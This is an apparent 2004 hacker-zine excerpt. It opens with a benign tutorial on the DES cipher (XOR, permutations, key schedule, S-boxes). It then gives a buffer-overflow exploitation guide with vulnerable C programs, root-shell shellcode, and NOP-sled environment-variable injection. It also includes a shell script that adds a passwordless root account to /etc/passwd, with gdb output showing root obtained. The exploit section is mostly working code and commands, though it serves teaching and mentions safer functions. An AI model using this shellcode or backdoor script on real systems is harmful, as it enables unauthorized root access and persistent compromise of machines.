modern cryptography, and I'm writing with the assumption that you've either
read my "Fun with Cryptology!" series or have the equivalent cryptological
background. As we've already seen, previous polyalphabetic ciphers were
just that-- very rote correlating ciphers that could be analyzed for letter
and word frequencies within whichever language was being used. However, newer
ciphers require heavy math usage, and because almost all of them are performed
on computers, it's far more feasible to use something that computers
understand-- binary.
How XOR Works
Having read my number systems tutorial, we already understand how letters
and numbers can interrelate, so after converting ASCII characters to binary,
we're left with 8-bit long strings of ones and zeros. While there's an entire
arithmetic and algebra to manipulating binary, there's a single operation we
want to focus on here: exclusive-or.
If we imagine that 1 is "true" and 0 is "false" (or on/off or whatever
else), we can look at our numbers as logic sequences. For example, take the
statement "IF the sky is cloudy OR the air pressure is low, THEN it will
rain." This is called an "or" statement, because both of the IF statements are
possible pointers to the end result; although together they are not always
necessary, if either one occurs then the result is possible.
Let's take a closer look, converting these English variables into math. We
can set A as "the sky is cloudy", B as "the air pressure is low", and C as
"it will rain". We can convert this into a truth table as such:
A | B || C
----------
0 | 0 || 0
0 | 1 || 1
1 | 0 || 1
1 | 1 || 1
This is a much faster way of examining our data. Now with DES, we'll be dealing
more with "exclusive-or", or cases in which a given C is only true if either A
or B is true, but not both. For example, take the statement "you can't have
your cake and eat it too". If A is "you have your cake" and B if "you've eaten
your cake", then C tests for the truth of the statement as demonstrated:
A | B || C
----------
0 | 0 || 0
0 | 1 || 1
1 | 0 || 1
1 | 1 || 0
Now let's try a few operations comparing sets of binary strings. Say we want to
xor 10101110 and 11010110. We can set up the operation as follows:
10101110
xor 11010110
01111000
Although there's far more to understand the basics of logic, understanding
xoring will suffice for the duration of this tutorial. However, before
introducing the fundamentals of DES, we need to introduce two important
statistical concepts: permutations and combinations.
Permutations and Combinations
If we're going to go any farther into cryptology, we need to cover some basic
techniques in statistics: the difference between permutations and
combinations. They are essentially methods of picking random numbers out of
a series: with permutations, order matters, with combinations, it doesn't.
For example, take the local Pick-3 Lottery. We have a basket of lottery balls
with numbers on them ranging between 1 and 40. To win the small prize, we need
to match the three balls that are picked, regardless of the order. If we match
the order as well, we win the huge prize. As we can imagine, it's -far- more
difficult to pick the latter; therefore the prize is much more valuable.
Permutations and combinations work in the same way. If you have a statistical
or graphing calculator handy, try playing around with these functions. On the
TI-8X calculators, it's usually a big P or C. If you have ten numbers and
want to "choose" a combination of 4 from them, you'd enter "10 C 4". Likewise,
for a permutation of 4, you'd enter "10 P 4". The former should result with
210, the latter with 5040. There's much much more to these operations, but
this should suffice for the purposes of this article.
In DES's case, programmers create a permutation table, or a list of numbers
from one through 64 that dictates how the plaintext should be permuted. For
example, say we have a ten character phrase (ABCDEFGHIJ) and the following
permutation table (3759481260). Starting with one, the permutation will put
the third character of the phrase as the first in the cipher text, the
seven character as the second, etc. The result will be CGEIDHABFJ. The
permutation tables are essential for successful deciphering.
A Quick Overview of DES
Before we actually get to the guts of DES, we need to examine the fundamental
structure therein. DES is a block cipher, which means it processes "blocks" of
data at a time, as opposed to a stream cipher which sends data through in
real time. For example, a Vigenere cipher is a stream cipher that works on
a single letter at a time, whereas something like DES would take a block
of four or five letters and encrypt them together. Grouping blocks for
isolated encipherment helps to increase the entropy of the cipher.
The typical DES block input breaks down to an 64-bit input plaintext
and a 56-bit input key (thank you NSA), resulting in an 64-bit ciphertext. The
process consists of three parts: an initial permutation on the left
plaintext, integration with S-boxes (which we'll look at later) and the first
subkey, and finally an XOR and a switch (which repeats the operations on the
right plaintext); the overall algorithm involves 16 iterations of the process
to ensure a secure level of randomness. Don't worry if that doesn't make
sense right now, we'll cover everything in greater detail momentarily.
Key Generation
[Original 56-bit Key]
|
[56-bit Permutation]
/ \
[Left Key] [Right Key]
| |
+-[LSR] [LSR]-+
| \ / |
| [48-bit Perm.]-------> outputs for k1
| |
+-[LSR] [LSR]-+
| \ / |
| [48-bit Perm.]-------> outputs for k(1+i)
~ ~
+-[LSR] [LSR]-+
\ /
[48-bit Perm.]-------> outputs for k16
(or whatever n is)
Before starting, we need to understand what a left shift register (LSR) is
and how it operates. You take a group of bits like 101110 and rotate them
all left one digit, resulting in something like 011101. If we have the
original key as 1011011011 and 10P8 it, the result might be 10011011. Now
we can split this into the left and right keys (LK and RK), so that LK
becomes 1001 and RK becomes 1011. LSR each, and we get 0011 and 0111.
If you noticed, we somehow start out with a single key and wind up with
multiple subkeys. DES actually runs our initial key through an algorithm
that outputs sixteen keys, one for each step in a round. This algorithm
is rather simple: our 56-bit key is permuted, split into two halves (first 28
bits and last 28 bits), and an LSR is performed on each half. For the first
key (k1), the halves are joined, permuted as 56P48, and outputted as the
48-bit k1. For the second key (k2), the halves are shifted again, repermuted,
and outputted as the 48-bit k2. This is repeated with each cycle, so if there
are 16 cycles there will be 16 total keys generated. If this sounds hazy, at
the end of the overview we'll take a look at an example run to clarify how
everything works.
The DES Encryption Process
[64 bit plaintext]
/ \
[Left Text] [Right Text]
| k1 |
| | |
[xor]---<--[F]--<----+
| |
| k2 |
| | |
+---->---[F]--->-[xor]
| |
~ ~
| k16 |
| | |
[xor]--<--[F]---<---+
| |
+--->---[Swap]--<--+
|
[64-bit ciphertext]
Now that we understand how keys are generated, it's time to see how they
work within the algorithm. DES consists of 16 cycles of taking half of a
plaintext, running it through a function F(key), and xoring the output of
that function with the other half of the plaintext; the next cycle does the
same routine but using the reverse halves. At the end of the algorithm
life, the halves are swapped a final time before being joined together as
the output ciphertext. We'll clarify momentarily with a walkthrough example.
So far, everything is fairly logical except this mysterious F(key)
function. How does it work and what exactly does it do? Within the F
function lies the previously mentioned S-boxes, the heart of DES encryption
which makes it so secure. But before we delve into S-boxes, let's take a look
at the F(key) function as a whole.
Outline of the F function
[32-bit Input]
|
[48-bit Expansion Permutation]
|
[XOR with 48-bit]<--- Key input
|
[S-box with 32-bit Output]
|
[Final Permutation]
|
[32-but F Output]
There are two interesting things to note here: the expansion permutation
(EP) and the S-box. EP is an extension of the permutation table concept,
with a varying output. For example, if we have an array of characters
{F,R,S,T}, we could permute them by the table {2,3,4,1,2,3}. This results
in the output {R,S,T,F,R,S}. In other words, we basically repeat existing
numbers to deliver a larger output; in this case, the output is the same
size as the key created during this cycle, so the next step is to xor the
key with the EP output.
Now we get to S-boxes, the heart of DES. Their full title being
Substitution boxes, they take a six bit input and return a highly
obfuscated 4 bit output. First, the 48-bit input string is split into 8
6-bit blocks, each of which are respectively inputted into one of eight
S-boxes. It's really easy to confuse an S-box table with a permutation
table because they are essentially the same thing-- a list of numbers.
However, S-boxes are handled completely differently. Rather than going in
a linear fashion across the table, the first and last bits of the input
form the row selection, and the middle four form the column selection.
If we have an S-box input of 110110, for example, the selected row will be
10 (or 2), and the selected column will be 1011 (or 11). Using basic
Cartesian graphic techniques, we scan the S-box chosen and return whatever
number lies at the location (11,2). Subsequently, the S-boxes contain only
the numbers 0 through 16, or those which can be represented in a four bit
binary output. This is much easier to understand when you look at source
code for DES (found, among other places, in the Linux kernel).
Once we have out 32-bit S-box output, we permute it a final time before
sending it back into the main cycle to be xored with the other half of the
plaintext. As we've already seen, the algorithm goes through 16 cycles
before doing a final side swap and outputting a 64-bit ciphertext.
Deciphering DES
Thanks to permutation tables and a retracable algorithm, if you have the
ciphertext and the original key, running through the process in reverse
will return the original plaintext. This means that the deciphering
process will take just as long as the enciphering process, which is where
the argument over DES's slowness comes in.
How Secure is DES?
Like any crypto system, the question of security always comes up.
Substitution ciphers held for over a thousand years before Arabian
researchers discovered frequency analysis. Polyalphabetic ciphers lasted
until Charles Babbage developed a multi-tiered method of frequency
analysis that involved finding the least common denominator of repeating
letters. A common belief among experienced cryptanalysts is that there will
always be pattern frequencies within ciphertexts, no matter how obfuscated
it has become.
Evident with DES, the purpose of each piece of the algorithm is to hide
the frequency into undecipherable randomness while still leaving a lock
where the person with the right key can restore it to its original state.
If the algorithm is successful with this, the only way someone can obtain
the original message without the key is by brute force-- hammering the
cipher text with multiple keys until it finally finds the right one. There
have been a number of attempts to achieve the most efficient DES brute
forcer, and in the past decade some have actually succeeded quite well.
EFF's DES Cracker Project
On 17 July 1998, the EFF created the first unclassified DES cracking
circuit for under $250,000, winning the RSA Laboratory's "DES Challenge
II" contest. There's so much to cover in this project that it would
require another separate article-- or the book _Cracking DES_ released by
the EFF-- but it's worth a quick overview. The circuit programming
included several useful features, including a search for "interesting"
plain text that would recognize certain patterns in the text the given key
recovered and set it aside for later analysis. For more information on
this project, check out the web site:
http://www.eff.org/Privacy/Crypto_misc/DESCracker/
Conclusion
To be fairly blunt, DES is outdated. The iteration cycle is slow, and
the 56 or 64-bit keys can easily be cracked by the average computer of
2004. There are new algorithms today-- Triple-DES, AES (the successor
to DES, based on the Rijndael cipher), etc-- that blow DES away.
Unfortunately, the rest of the world doesn't move with the crypto
community, which means that a lot of programs still incorporate DES
encryption... and they're just fine. As Justin Troutman mentioned in his
Interz0ne 3 speech, it's far more important to find an algorithm and key
that fits your needs, rather than to jump for the latest and greatest
thing. DES has its uses, and always will.
Shoutouts
Thanks to theclone and #hackcanada, the Brooklyn 2600 crew, Elonka, Raymond,
Justin Troutman, everyone from mw2600, and anyone from #se2600, #bsrf, and
#security-forums (sgt_b and hugo_NL) who helped out!
References:
_Cryptography and Network Security_ by William Stallings
_Applied Cryptography_ by Bruce Schneier
_The Puzzle Palace_ by James Bamford
_Crypto_ by Steven Levy
_The Codebreakers_ by David Kahn
_Cryptonomicon_ by Neal Stephenson
--aestetix
aestetix@aestetix.net
http://www.aestetix.net
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<tek> THECLONE AKA KERMIT T FROG IS AN INFORMANT FOR PBS
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-=[ Buffer Overflows - taking a different approach ]=-
-=[ ]=-
-=[ Author: omin0us ]=-
-=[ <http://dtors.ath.cx> 4.27.04 ]=-
In this paper i will attempt to document a method of expoiting buffer
overflows taught to me by my friend Kursu. Hopefully going into this you
will have a little understanding of the C programming language and x86
Assembler's language.
A little background info
------------------------
A buffer overflow exists in a program when in input buffer goes unchecked.
eg: inputting more data than an input buffer was designed to hold. For example
say you have a buffer that is 100bytes big, and you copy the first commandline
argument into that buffer using strcpy(). You could potentially overflow that
buffer, as strcpy() does not check the size of the buffer its copying from. so
if the first argument is 1000 bytes long,
You are overflowing the buffer by about 900bytes. In memory, the stack is
usually set up like this (on x86 arch. anyways, as well as MIPS, Motorala,
and others i believe):
+-----------------------+ Upper Memory addresses (0xFFFFFFFF)
| |
| Reserverd Addresses |
| |
|-----------------------| Botton of Stack
| |
| Memory Stack |
| |
| |
+-----------------------+ Top of Stack
| | |
| | |
| V |
| |
| |
| |
| /|\ |
| | |
| | |
+-----------------------+
| |
| .data section |
| |
+-----------------------+
| |
| .text section |
+-----------------------+
| |
| reserverd addresses |
+-----------------------+ Lower Memory Addresses (0x00000000)
The Memory stack grows downwards towards lower memory addresses. All the
while the data section (where memory is dynamically allocated during the
execution of a program using calls such as malloc() and free() )is growing
upwards towards upper memory addresses.
Lets take this program for instance
--------[BEGIN CODE]------------------------
/* vuln1.c */
#include <stdio.h>
#include <strings.h>
int main(int argc, char *argv[]);
{
char buffer[75];
strcpy(buffer, argv[1]);
printf("buffer: %s\n", buffer);
return(0);
}
--------[END CODE]--------------------------
when the memory is allocated on the stack for that program it looks like
this:
Upper Memory Lower Memory
_____________________________________________________________
| | | | |
| $esp(4bytes) | buffer | $ebp(4bytes) | RET[$eip](4bytes |
|________________|__________|______________|__________________|
Bottom of Stack Top of Stack
The ESP is a 4byte memory address that points to the bottom of the last
instruction. The Buffer is our allocated memory to store data. The EBP is
a 4byte memory address that points to the bottom of the allocated memory
in our program. The Return address points to the Next instruction to jump
to in memory.
So what happens if we input 100 bytes as our first command line argument.
And then we copy that 100 bytes into our buffer. Well, i'll tell you what
happens, we will overwrite our Base Pointer Address, and then our Return
Address. The programwill then try and jump to the new address contained
in the RETURN Address, and will most likely crash. But what if we are able
to feed it a new address that points to any code of our choice. It would
then execute that code. And if the program we are exploiting is SUID root, we
would be executing that code as root. So lets give this a try. But lets
try and do this in a non conventional way of exploiting it.
START---------------------------------------------
bash-2.05b$ ls -l total 12 -rwsr-xr-x 1 root users 10756 Apr 26 15:43
vuln1* bash-2.05b$ ./vuln1 AAAA buffer: AAAA bash-2.05b$ gdb -q vuln1
(gdb) run `perl -e 'print "A"x92'` Starting program:
/home/omin0us/levels/vuln1 `perl -e 'print "A"x92'` buffer:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x4003dd03 in __libc_start_main () from /lib/libc.so.6
(gdb) info reg ebp eip
ebp 0x41414141 0x41414141
eip 0x4003dd03 0x4003dd03
(gdb) quit
The program is running. Exit anyway? (y or n) y
bash-2.05b$
END----------------------------------------------
So as you can see we've overwrittne our base pointer with all A's (hex 0x41).
Now lets see if we can overwrite our Return address too.
START----------------------------------------------
bash-2.05b$ gdb -q vuln1 (gdb) run `perl -e 'print "A"x96'` Starting
program: /home/omin0us/levels/vuln1 `perl -e 'print "A"x96'` buffer:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()
(gdb) info reg ebp eip ebp 0x41414141 0x41414141 eip 0x41414141 0x41414141
(gdb) quit The program is running. Exit anyway? (y or n) y bash-2.05b$
END-----------------------------------------------
As you can see we have over written our base pointer and our instruction
pointer. Now the program is trying to jump to the address 0x41414141 and
execute the code contained there. which most likely there isn't any. so it
crashes with a Segmentation Fault.
So lets try and exploit our vulnerable program. First we'll need some
Shellcode to execute.
setuid(0);
\x31\xdb xorl %ebx,%ebx
\x8d\x43\x17 leal 0x17(%ebx),%eax
\xcd\x80 int $0x80
exec('/bin/sh');
\x31\xd2 xorl %edx,%edx
\x52 pushl %edx
\x68\x6e\x2f\x73\x68 pushl $0x68732f6e
\x68\x2f\x2f\x62\x69 pushl $0x69622f2f
\x89\xe3 movl %esp,%ebx
\x52 pushl %edx
\x53 pushl %ebx
\x89\xe1 movl %esp,%ecx
\xb0\x0b movb $0xb,%al
\xcd\x80 int $0x80
but lets padd it with some NOP's as well. A NOP is an assembler
instruction (0x90)that does nothing, hence the name NOP -- Null OPerator.
It acts as a little delay, then goes to the next instruction in memory. If
we create a sled of these, then we can go from NOP to NOP till we hit our
shellcode to execute. So the way we are gonna do this, is by inputting it
into an environment Variable.
START------------------------------------------------
bash-2.05b$ perl -e 'print "\x90"x100 . "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2
\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b
\xcd\x80"' > shell
bash-2.05b$ cat shell
f
1ÛCÍ1ÒR
hn/shh//biãRSá°
Íbash-2.05b$
bash-2.05b$ export SHELLCODE=`cat shell`
bash-2.05b$ bash-2.05b$ env | grep SHELLCODE
SHELLCODE=
1ÛCÍ1ÒRhn/shh//biãRSá°
Í bash-2.05b$
END-------------------------------------------------
Now we need to find the address of our Environment Variable 'SHELLCODE'.
There are a couple ways of doing this. I suppose i could show you both.
One way, is to write a program that will use getenv() and find the address
of SHELLCODE in memory, the other way (which kursu showed me to be much
easier) is to use GDB to find it.
Method 1: -------- create a program to use getenv() to find the address.
--------[BEGIN CODE]-----------------------------
#include <stdio.h> #include <stdlib.h>
int main(int argc, char *argv[])
{
char *addr_ptr;
if( argc != 2 )
{
printf("Usage: %s <ENVIRONMENT VAR>\n", argv[0]);
exit(-1);
}
if((addr_ptr = getenv(argv[1])) == NULL)
{
fprintf(stderr, "Error: %s: %s does not exist\n", argv[0], argv[1]);
exit(-1);
}
printf("Address of %s: %p\n", argv[1], addr_ptr);
return(0);
}
--------[END CODE]-------------------------------------
Lets try our prog out.
START--------------------------------------------------
bash-2.05b$ gcc -o getenv getenv.c
bash-2.05b$ ./getenv TEST Error:
./getenv: TEST does not exist
bash-2.05b$ ./getenv SHELLCODE
Address of SHELLCODE: 0xbffffaf3
bash-2.05b$
END----------------------------------------------------
now we know that our NOP's and shellcode reside at 0xbffffaf3. So lets add
say 20 to that so that we have an address somewhere in our NOP sled. this
gives us 0xbffffaf3 + 20 = 0xbffffb07
Method 2: -------- We can also find a usable address by using GDB (thanks
kursu). So lets try it this way
START--------------------------------------------------
bash-2.05b$ gdb -q vuln1 (gdb) break _init Breakpoint 1 at 0x804825a (gdb)
run Starting program: /home/omin0us/levels/vuln1
Breakpoint 1, 0x0804825a in _init ()
(gdb) x/20s $esp 0xbffff880: ""
0xbffff881: "±"
0xbffff883: "@ôøÿ¿\230øÿ¿¼\203\004\b$\025@@Q\001@Èøÿ¿êÜ\003@à\203\004\b"
0xbffff8a5: ""
0xbffff8a6: ""
0xbffff8a7: ""
.
.
.
0xbffffa03: ""
0xbffffa04: ""
0xbffffa05: ""
0xbffffa06: "i686"
0xbffffa0b: "/home/omin0us/levels/vuln1"
0xbffffa26: "CPLUS_INCLUDE_PATH=/usr/lib/qt-3.2.1/include"
0xbffffa53: "MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/usr/lib/java/
man:/usr/lib/qt-3.2.1/doc/man:/usr/share/texmf/man"
0xbffffac3: "HZ=100"
0xbffffaca: "HOSTNAME=omin0us.dtors.ath.cx"
0xbffffaeb: "SHELLCODE=",'\220' <repeats 100 times>, "1Û\215C\027Í\2001ÒRhn/
shh//bi\211ãRS\211á°\vÍ\200"
0xbffffb78: "TERM=rxvt"
0xbffffb82: "SHELL=/bin/bash"
.
.
.
(gdb)
END------------------------------------------------------
So here we see we have found the address of 'SHELLCODE' in memory. Lets
add 30 bytes to that address so that we land somewhere in our NOP sled.
START----------------------------------------------------
.
.
.
0xbffffa03: ""
0xbffffa04: ""
0xbffffa05: ""
0xbffffa06: "i686"
0xbffffa0b: "/home/omin0us/levels/vuln1"
0xbffffa26: "CPLUS_INCLUDE_PATH=/usr/lib/qt-3.2.1/include"
0xbffffa53: "MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/usr/lib/java/
man:/usr/lib/qt-3.2.1/doc/man:/usr/share/texmf/man"
0xbffffac3: "HZ=100"
0xbffffaca: "HOSTNAME=omin0us.dtors.ath.cx"
0xbffffaeb: "SHELLCODE=",'\220' <repeats 100 times>, "1Û\215C\027Í\2001ÒRhn/
shh//bi\211ãRS\211á°\vÍ\200"
0xbffffb78: "TERM=rxvt"
0xbffffb82: "SHELL=/bin/bash"
.
.
.
(gdb) x/s 0xbffffaeb+50
0xbffffb1d: '\220'<repeats 60 times>, "1Û\215C\027Í\2001ÒRhn/shh//bi\211ãRS\
211á°\vÍ\200"
(gdb) quit
The program is running.
Exit anyway? (y or n) y
bash-2.05b$
END--------------------------------------------------------
Alright, now we have another usable address to exploit our vulnerable
program.
so lets give it a try. Remember x86 is little endian, so we have to feed
our address backwards onto the stack.
START------------------------------------------------------
bash-2.05b$ ./vuln1 `perl -e 'print "\x1d\xfb\xff\xbf"x24'` buffer:
ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿ûÿ¿
sh-2.05b#
END--------------------------------------------------------
As Emril from that cooking show would say..."BAM!". instant root shell
ladies and gentleman. :)
All this was made possible because our original vulnerable program used
strcpy() instead of strncpy().
Now lets present another scenario that i ran into once. First, some
vulnerable code:
------[BEGIN CODE]----------------------------------------
/* vuln2.c */
#include <stdio.h> #include <strings.h>
int main()
{
char buffer[100];
printf("What is your name? ");
gets(buffer);
printf("Hello %s!\n", buffer);
return(0);
}
-------[END CODE]------------------------------------------
our program is using the gets() funtion. A very dangerous function indeed.
What if we didn't have the source to this program? how would we know it
was using the gets() function? Well, one way i usually probe programs i am
trying to break is the 'strings' command.
START------------------------------------------------------
bash-2.05b$ strings vuln2 |more
/lib/ld-linux.so.2
libc.so.6
printf
gets <----------------------- Right here is our culprit!
_IO_stdin_used
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVhl
What is your name?
Hello %s!
GCC: (GNU) 3.2.3
GCC: (GNU) 3.2.3
GCC: (GNU) 3.2.3
GCC: (GNU) 3.2.3
GCC: (GNU) 3.2.3
GCC: (GNU) 3.2.3
GCC: (GNU) 3.2.3
_IO_stdin_used
/tmp/glibc-2.3.2/build-glibc-2.3.2/csu/crti.S
/tmp/glibc-2.3.2/csu
GNU AS 2.14.90.0.2
/tmp/glibc-2.3.2/build-glibc-2.3.2/csu/crtn.S
/tmp/glibc-2.3.2/csu
.
.
.
__dso_handle
__libc_csu_fini
gets@@GLIBC_2.0
_init _start
__fini_array_start
__libc_csu_init
__bss_start main
__libc_start_main@@GLIBC_2.0
__init_array_end
data_start
printf@@GLIBC_2.0
_fini
_edata
_GLOBAL_OFFSET_TABLE_
_end
__init_array_start
_IO_stdin_used
__data_start
_Jv_RegisterClasses
__gmon_start__
bash-2.05b$
END-------------------------------------------------------
The problem with gets() is that you can't execute normal shellcode. gets()
can't execute binary's. It CAN however execute a shell script :)
First, lets find out the bounds of our buffer.
START----------------------------------------------------
bash-2.05b$ ./vuln2
What is your name? omin0us
Hello omin0us!
bash-2.05b$ perl -e 'print "A"x124' | ./vuln2
What is your name? Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
Segmentation fault
bash-2.05b$ gdb -q vuln2
(gdb) run
Starting program: /home/omin0us/levels/vuln2
What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
Program received signal SIGSEGV, Segmentation fault.
0x4003dd03 in __libc_start_main () from /lib/libc.so.6
(gdb) info reg ebp eip
ebp 0x41414141 0x41414141
eip 0x4003dd03 0x4003dd03
(gdb) run
The program being debugged has been started already. Start it from the
beginning? (y or n) y
Starting program: /home/omin0us/levels/vuln2
What is your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg ebp eip
ebp 0x41414141 0x41414141
eip 0x41414141 0x41414141
(gdb) quit
The program is running.
Exit anyway? (y or n) y
bash-2.05b$
END-------------------------------------------------------
Ok, so here, what i did, was feed the program 124 'A's and got a segfault.
So i fired up GDB and copyed the 124 A's into the input and checked my
registars. Bingo, ebp was now 0x41414141. So i added 4 more A's to over
wrote the Return address (128 A's) and checked my registers again. EIP was
now 0x41414141 as well. so we now know it takes 128 bytes to over write
the return address.
so we can write some shellcode to execute a shellscript that will do
various things.
we'll make a shellscript to do some interesting stuff.
------[BEGIN CODE]----------------------------------------
#!/bin/sh
#/tmp/omin.sh by omin0us
echo "Hello From Root!" echo "omin::0:0:/root:/bin/sh" >> /etc/passwd
------[END CODE]------------------------------------------
Our shell script when executed will echo "Hello From Root!" to the console
and create an account with root privs and no password.
Now we need to write some SHELLCODE to execute /tmp/omin.sh
\x31\xc0 xorl %eax, %eax
\x31\xdb xorl %ebx, %ebx
\x31\xc9 xorl %ecx, %ecx
\x31\xd2 xorl %edx, %edx
\x52 pushl %edx
\x68\x6e\x2e\x73\x68 pushl $0x68732e6e
\x68\x2f\x6f\x6d\x69 pushl $0x696d6f2f
\x68\x2f\x74\x6d\x70 pushl $0x706d742f
\x89\xe3 movl %esp, %
ebx
\x52 pushl %edx
\x53 pushl %ebx
\x89\xe1 movl %esp, %ecx
\xb0\x0b movb $0xb, %al
\xcd\x80 int $0x80
\x31\xdb xorl %ebx, %ebx
\x89\xd8 movl %ebx, %eax
\x40 incl %eax
\xcd\x80 int $0x80
ok, so we have our shell script. and our shellcode. lets put our shellcode
into an environment var
START------------------------------------------------------
bash-2.05b$ perl -e 'print "\x90"x100 . "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52
\x68\x6e\x2e\x73\x68\x68\x2f\x6f\x6d\x69\x68\x2f\x74\x6d\x70\x89\xe3\x52\x53
\x89\xe1\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"' > shell2
bash-2.05b$ export SHELLCODE=`cat shell2`
bash-2.05b$ env |grep SHELLCODE
SHELLCODE=
1À1Û1É1ÒRhn.shh/omih/tmpãRSá°
Í1ÛØ@Í
bash-2.05b$
END----------------------------------------------------------
ok, now lets use GDB to find an address inside our NOP sled
START--------------------------------------------------------
bash-2.05b$ gdb -q vuln2
(gdb) break _init
Breakpoint 1 at 0x804825a
(gdb) run
Starting program: /home/omin0us/levels/vuln2
Breakpoint 1, 0x0804825a in _init ()
(gdb) x/20s $esp
0xbffff870: ""
0xbffff871: "±"
0xbffff873: "@äøÿ¿\210øÿ¿Ì\203\004\b$\025@@Q\001@¸øÿ¿êÜ\003@ð\203\004\b"
0xbffff895: ""
0xbffff896: ""
0xbffff897: ""
.
.
.
0xbffff9f8: ""
0xbffff9f9: ""
0xbffff9fa: "i686"
0xbffff9ff: "/home/omin0us/levels/vuln2"
0xbffffa1a: "CPLUS_INCLUDE_PATH=/usr/lib/qt-3.2.1/include"
0xbffffa47: "MANPATH=/usr/local/man:/usr/man:/usr/X11R6/man:/usr/lib/java/
man:/usr/lib/qt-3.2.1/doc/man:/usr/share/texmf/man"
0xbffffab7: "HZ=100"
0xbffffabe: "HOSTNAME=omin0us.dtors.ath.cx"
0xbffffadf: "SHELLCODE=",'\220' <repeats 100 times>, "1À1Û1É1ÒRhn.shh/omih
/tmp\211ãRS\211á°\vÍ\2001Û\211Ø@Í\200"
0xbffffb77: "TERM=rxvt"
0xbffffb81: "SHELL=/bin/bash"
.
.
.
(gdb) x/s 0xbffffadf+30
0xbffffafd: '\220' <repeats 80 times>, "1À1Û1É1ÒRhn.shh/omih/tmp\211ãRS\211á°
\vÍ\2001Û\211Ø@Í\200"
(gdb) quit
The program is running.
Exit anyway? (y or n) y
bash-2.05b$
END--------------------------------------------------
Ok, we have a usable, address. lets feed that to our vulnerable program
and see if it runs our shellcode.
START------------------------------------------------
bash-2.05b$ perl -e 'print "\xdf\xfa\xff\xbf"x100' | ./vuln2 What is your
name? Hello ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ
¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ
¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ
¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ
¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ
¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿ßúÿ¿!
Hello From Root!
bash-2.05b$ cat /etc/passwd | grep omin::0
omin::0:0::/root:/bin/sh
bash-2.05b$
.
.
.
omin0us Login: omin
bash-2.05b# whoami
root
bash-2.05b# id
uid=0(root) gid=0(root) groups=0(root)
bash-2.05b#
END---------------------------------------------------
All that could have been prevented if the vulnerable program had used
fgets() instead.
Hopefully, you have learned quite a bit on buffer overflows and how they
work as well as a different method for exploiting them. These problems may
be easily avoided if you just make sure you check all input data.
